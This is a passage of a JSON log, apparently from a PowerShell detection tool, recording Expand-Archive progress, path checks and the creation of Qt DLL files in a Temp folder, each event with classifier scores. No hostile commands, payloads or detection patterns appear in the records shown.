value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\QtCore4.dll\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.8706574060513687, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181210", "time": {"SystemTime": "2024-10-18T10:27:57.5593290Z"}, "totalscore": {"totalscore": 52.420479509974804, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 52.420479509974804, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Test-Path): 
\"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "removed_backtick": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.524204795099748, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181211", "time": {"SystemTime": "2024-10-18T10:27:57.8652189Z"}, "totalscore": {"totalscore": 72.7217257066981, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 72.7217257066981, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\QtCore4.dll'.\"\n", "removed_backtick": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\QtCore4.dll'.\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.7272172570669809, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181213", "time": {"SystemTime": "2024-10-18T10:27:58.0206608Z"}, "totalscore": {"totalscore": 41.949542063429696, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.949542063429696, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 
'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"2\"\n", "removed_backtick": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"2\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41949542063429696, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181215", "time": {"SystemTime": "2024-10-18T10:27:58.0210516Z"}, "totalscore": {"totalscore": 41.747568953150854, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.747568953150854, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"9\"\n", "removed_backtick": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in 
progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"9\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41747568953150854, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181216", "time": {"SystemTime": "2024-10-18T10:27:58.0216282Z"}, "totalscore": {"totalscore": 56.33757794135137, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 56.33757794135137, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"QtGui4.dll\"\n", "removed_backtick": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"QtGui4.dll\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.5633757794135137, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181217", "time": {"SystemTime": "2024-10-18T10:27:58.0222782Z"}, "totalscore": {"totalscore": 87.06574060513687, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 87.06574060513687, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\QtGui4.dll\"\n", 
"removed_backtick": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\QtGui4.dll\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.8706574060513687, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181218", "time": {"SystemTime": "2024-10-18T10:27:58.0229676Z"}, "totalscore": {"totalscore": 52.420479509974804, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 52.420479509974804, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "removed_backtick": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.524204795099748, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181219", "time": {"SystemTime": "2024-10-18T10:27:58.3847912Z"}, "totalscore": {"totalscore": 72.7217257066981, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 72.7217257066981, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\QtGui4.dll'.\"\n", "removed_backtick": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 
'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\QtGui4.dll'.\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.7272172570669809, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181221", "time": {"SystemTime": "2024-10-18T10:28:11.6689020Z"}, "totalscore": {"totalscore": 41.949542063429696, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.949542063429696, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"2\"\n", "removed_backtick": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"2\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41949542063429696, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181223", "time": {"SystemTime": "2024-10-18T10:28:11.6693580Z"}, "totalscore": {"totalscore": 41.9214231289426, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.9214231289426, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 
'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"10\"\n", "removed_backtick": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"10\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.419214231289426, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181224", "time": {"SystemTime": "2024-10-18T10:28:11.6702509Z"}, "totalscore": {"totalscore": 56.33757794135137, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 56.33757794135137, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"QtNetwork4.dll\"\n", "removed_backtick": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"QtNetwork4.dll\"\n", 
"error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.5633757794135137, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181225", "time": {"SystemTime": "2024-10-18T10:28:11.6710937Z"}, "totalscore": {"totalscore": 87.06574060513687, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 87.06574060513687, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\QtNetwork4.dll\"\n", "removed_backtick": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\QtNetwork4.dll\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.8706574060513687, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181226", "time": {"SystemTime": "2024-10-18T10:28:11.6718944Z"}, "totalscore": {"totalscore": 52.420479509974804, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 52.420479509974804, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "removed_backtick": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, 
"logistic_reg": 0.524204795099748, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181227", "time": {"SystemTime": "2024-10-18T10:28:11.6965645Z"}, "totalscore": {"totalscore": 72.7217257066981, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 72.7217257066981, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\QtNetwork4.dll'.\"\n", "removed_backtick": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\QtNetwork4.dll'.\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.7272172570669809, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181229", "time": {"SystemTime": "2024-10-18T10:28:12.3908353Z"}, "totalscore": {"totalscore": 41.949542063429696, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.949542063429696, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"2\"\n", "removed_backtick": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; 
value=\"2\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41949542063429696, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181231", "time": {"SystemTime": "2024-10-18T10:28:12.3915218Z"}, "totalscore": {"totalscore": 41.75026783716634, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.75026783716634, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"11\"\n", "removed_backtick": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"11\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.4175026783716634, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181232", "time": {"SystemTime": 
"2024-10-18T10:28:12.3923738Z"}, "totalscore": {"totalscore": 56.33757794135137, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 56.33757794135137, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"QtXml4.dll\"\n", "removed_backtick": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"QtXml4.dll\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.5633757794135137, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181233", "time": {"SystemTime": "2024-10-18T10:28:12.3933485Z"}, "totalscore": {"totalscore": 87.06574060513687, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 87.06574060513687, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\QtXml4.dll\"\n", "removed_backtick": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\QtXml4.dll\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.8706574060513687, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181234", "time": {"SystemTime": "2024-10-18T10:28:12.3943510Z"}, "totalscore": {"totalscore": 52.420479509974804, "score": 
{"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 52.420479509974804, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "removed_backtick": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.524204795099748, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181235", "time": {"SystemTime": "2024-10-18T10:28:12.4136304Z"}, "totalscore": {"totalscore": 72.7217257066981, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 72.7217257066981, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\QtXml4.dll'.\"\n", "removed_backtick": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\QtXml4.dll'.\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.7272172570669809, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181237", "time": {"SystemTime": "2024-10-18T10:28:14.0602702Z"}, "totalscore": {"totalscore": 41.949542063429696, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.949542063429696, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Progress): 
\"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"2\"\n", "removed_backtick": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"2\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41949542063429696, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181239", "time": {"SystemTime": "2024-10-18T10:28:14.0606108Z"}, "totalscore": {"totalscore": 41.94379728465864, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.94379728465864, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"12\"\n", "removed_backtick": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; 
value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"12\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41943797284658646, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181240", "time": {"SystemTime": "2024-10-18T10:28:14.0611178Z"}, "totalscore": {"totalscore": 46.652752419985084, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 46.652752419985084, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"Resource/\"\n", "removed_backtick": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"Resource/\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.46652752419985083, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181241", "time": {"SystemTime": "2024-10-18T10:28:14.0657585Z"}, "totalscore": {"totalscore": 51.012919429460865, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 51.012919429460865, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): 
name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\\\"\n", "removed_backtick": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\\\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.5101291942946087, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181242", "time": {"SystemTime": "2024-10-18T10:28:14.1184839Z"}, "totalscore": {"totalscore": 70.3776474529961, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 70.3776474529961, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(New-Item): \"New-Item\"\nParameterBinding(New-Item): name=\"ItemType\"; value=\"Directory\"\nParameterBinding(New-Item): name=\"Confirm\"; value=\"False\"\nParameterBinding(New-Item): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\\\"\nCommandInvocation(Out-Null): \"Out-Null\"\nParameterBinding(Out-Null): name=\"InputObject\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\"\n", "removed_backtick": "CommandInvocation(New-Item): \"New-Item\"\nParameterBinding(New-Item): name=\"ItemType\"; value=\"Directory\"\nParameterBinding(New-Item): name=\"Confirm\"; value=\"False\"\nParameterBinding(New-Item): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\\\"\nCommandInvocation(Out-Null): \"Out-Null\"\nParameterBinding(Out-Null): name=\"InputObject\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.703776474529961, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181243", "time": {"SystemTime": "2024-10-18T10:28:14.1244032Z"}, "totalscore": {"totalscore": 48.62633183162733, "score": {"detect_iex": 0, "url_result": 0, 
"detect_sign": 0, "logistic_reg": 48.62633183162733, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\\\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "removed_backtick": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\\\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.48626331831627334, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181244", "time": {"SystemTime": "2024-10-18T10:28:14.1464500Z"}, "totalscore": {"totalscore": 57.02957879083289, "score": {"detect_iex": 0, "url_result": 0, 